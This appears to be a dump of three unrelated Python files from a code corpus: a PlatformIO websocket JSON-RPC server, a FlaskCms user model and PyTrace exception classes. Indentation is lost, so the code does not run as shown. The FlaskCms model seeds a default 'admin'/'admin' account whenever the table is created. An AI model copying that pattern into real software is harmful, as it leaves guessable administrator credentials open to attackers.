from jsonrpc.exceptions import JSONRPCDispatchException
from twisted.internet import defer, reactor
from platformio.compat import PY2, dump_json_to_unicode, is_bytes
class JSONRPCServerProtocol(WebSocketServerProtocol):
def onOpen(self):
self.factory.connection_nums += 1
if self.factory.shutdown_timer:
self.factory.shutdown_timer.cancel()
self.factory.shutdown_timer = None
def onClose(self, wasClean, code, reason): # pylint: disable=unused-argument
self.factory.connection_nums -= 1
if self.factory.connection_nums == 0:
self.factory.shutdownByTimeout()
def onMessage(self, payload, isBinary): # pylint: disable=unused-argument
# click.echo("> %s" % payload)
response = jsonrpc.JSONRPCResponseManager.handle(
payload, self.factory.dispatcher
).data
# if error
if "result" not in response:
self.sendJSONResponse(response)
return None
d = defer.maybeDeferred(lambda: response["result"])
d.addCallback(self._callback, response)
d.addErrback(self._errback, response)
return None
def _callback(self, result, response):
response["result"] = result
self.sendJSONResponse(response)
def _errback(self, failure, response):
if isinstance(failure.value, JSONRPCDispatchException):
e = failure.value
else:
e = JSONRPCDispatchException(code=4999, message=failure.getErrorMessage())
del response["result"]
response["error"] = e.error._data # pylint: disable=protected-access
self.sendJSONResponse(response)
def sendJSONResponse(self, response):
# click.echo("< %s" % response)
if "error" in response:
click.secho("Error: %s" % response["error"], fg="red", err=True)
response = dump_json_to_unicode(response)
if not PY2 and not is_bytes(response):
response = response.encode("utf-8")
self.sendMessage(response)
class JSONRPCServerFactory(WebSocketServerFactory):
protocol = JSONRPCServerProtocol
connection_nums = 0
shutdown_timer = 0
def __init__(self, shutdown_timeout=0):
super(JSONRPCServerFactory, self).__init__()
self.shutdown_timeout = shutdown_timeout
self.dispatcher = jsonrpc.Dispatcher()
def shutdownByTimeout(self):
if self.shutdown_timeout < 1:
return
def _auto_shutdown_server():
click.echo("Automatically shutdown server on timeout")
reactor.stop()
self.shutdown_timer = reactor.callLater(
self.shutdown_timeout, _auto_shutdown_server
)
def addHandler(self, handler, namespace):
self.dispatcher.build_method_map(handler, prefix="%s." % namespace)
| platformio/platformio | platformio/commands/home/rpc/server.py | Python | apache-2.0 | 3,610 |
#!/usr/bin/env python
# coding=utf-8
from flaskcms.lib import db
from flask.ext.sqlalchemy import event
from passlib.apps import mysql_context as pwd_context
class User(db.Model):
__tablename = "user"
id = db.Column(db.Integer, primary_key=True)
name = db.Column(db.String(10))
passwd = db.Column(db.String(41))
post = db.relationship('Post', backref='user', lazy='dynamic')
def __init__(self, name, passwd):
self.name = name
self.passwd = passwd
def is_authenticated(self):
"""Return True if the user is authenticated."""
if self.id:
return True
else:
return False
def is_active(self):
"""True, as all users are active."""
return True
def is_anonymous(self):
"""False, as anonymous users aren't supported."""
return False
def get_id(self):
return self.id
# 数据库创建时,默认插入默认账户
def insert_default(target, connection, **kw):
default_user = User("admin", pwd_context.encrypt("admin"))
db.session.add(default_user)
db.session.commit()
event.listen(User.__table__, 'after_create', insert_default)
| Franciscowxp/FlaskCms | flaskcms/modules/account/model.py | Python | mit | 1,196 |
"""
Global PyTrace exception classes.
"""
class ImproperlyConfigured(Exception):
"""PyTrace is somehow improperly configured"""
pass
class StandardInputReadError(Exception):
"""
Raised when attempted to read from Standard Input Stream
while Input Queue is empty
"""
MESSAGE = "Unable to read from Standard Input Steam"
def __init__(self, prompt):
super(StandardInputReadError, self).__init__(self.MESSAGE)
self.prompt = prompt
class StandardInputEvalError(Exception):
"""
Raised by `UserInputReader` when in evaluation mode and user input
contains error
"""
def __init__(self, real_exception=None):
msg = None
if isinstance(real_exception, SyntaxError):
msg = real_exception.msg
self.filename = real_exception.filename
self.lineno = real_exception.lineno
self.message = real_exception.message
self.offset = real_exception.offset
elif isinstance(real_exception, (str, unicode)):
msg = real_exception
super(StandardInputEvalError, self).__init__(msg)
class StandardInputError(Exception):
"""
Warpper around exception raised by `exec` by `UserInputReader` when in
evaluation mode
"""
def __init__(self, inner_exception):
super(StandardInputError, self).__init__(str(inner_exception))
self.inner_exception = inner_exception
class UnsafeImportError(Exception):
"""
Raised when attempted to import module that is not marked as safe within
sandbox
"""
message_format = "%s is not allowed to be imported in current environment"
def __init__(self, module, *args):
msg = self.message_format % module
super(UnsafeImportError, self).__init__(msg, *args)
class NoSerializerFoundError(Exception):
"""
Raised by `pytrace.serializers` when no suitable serializer is
found for serialization
"""
def __init__(self, value_type, *args):
message = "No type serializer found for {0}".format(value_type)
super(NoSerializerFoundError, self).__init__(message, *args)
class SerializationError(Exception):
"""
Raised by `pytrace.serializers` when failed to encode specified value due
to internal serializer error
"""
def __init__(self, encoder, value, *args):
self.encoder = encoder
self.value = value
message = "Failed to serialize {0} using {1}".format(value, encoder)
super(SerializationError, self).__init__(message, *args)
| uadnan/pytrace | pytrace/core/exceptions.py | Python | mit | 2,561 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.